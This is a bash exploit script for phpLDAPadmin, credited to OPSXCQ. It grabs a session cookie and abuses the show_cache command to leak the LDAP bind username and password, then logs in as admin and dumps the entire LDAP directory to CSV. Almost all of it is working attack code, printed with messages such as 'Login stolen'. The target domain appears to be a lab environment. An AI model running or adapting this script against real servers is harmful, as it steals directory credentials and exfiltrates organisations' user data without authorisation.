exploit.sh

#!/bin/bash

function exploit() {
    if [[ -z $1 ]]
    then
        echo '[-] Missing the remote host to attack'
    fi
    local url="$1"

    echo "[+] Trying to get the cookie value from ${url}"
    local cookie=$(curl ${url} --silent --cookie-jar - --output /dev/null | grep -vE '^$|#' | awk '{print $6"="$7}')
    if [[ -z $cookie ]]
    then
        echo "[-] Problems connecting to ${url}"
        return -1
    fi

    local username=$(curl --silent ${url}"/cmd.php?cmd=show_cache&global=HACKTHEPLANET&key=GLOBALS" -H "Cookie: ${cookie}" | grep bind_id | grep cn | head -n 1 | awk '{print $3}')
    local password=$(curl --silent ${url}"/cmd.php?cmd=show_cache&global=HACKTHEPLANET&key=GLOBALS" -H "Cookie: ${cookie}" | grep bind_pass | grep -v Array | head -n 1 | awk '{print $3}')

    if [[ -z $username || -z $password ]]
    then
        echo "[-] Can't get the username or the password, trying to dump the LDAP database anyway"
    else
        echo "[*] Login stolen ${username} with password ${password}"

        echo '[+] Logging in with the stolen credentials'
        curl "${url}/cmd.php" -H 'Content-Type: application/x-www-form-urlencoded' -H "Cookie: ${cookie}; collapsedNodes=" --data 'cmd=login& server_id=1& nodecode[login_pass]=1& login=cn=admin,dc=vulnerable,dc=strm,dc=sh& login_pass=admin& submit=Authenticate'
    fi

    echo "[+] Dumping the database to CSV"

    curl "${url}/cmd.php" -H 'Content-Type: application/x-www-form-urlencoded' -H "Cookie: ${cookie}; collapsedNodes=" --data 'cmd=export& server_id=1& dn=dc=vulnerable,dc=strm,dc=sh& scope=sub& filter=(objectClass=*)& attributes=*& save_as_file=on& exporter_id=CSV& format=unix& target=Proceed+>>'

}

echo '[+] phpLdap remote exploit by OPSXCQ'
echo '    Get the source code at https://github.com/opsxcq/exploit-phpldapadmin-remote-dump'

exploit $@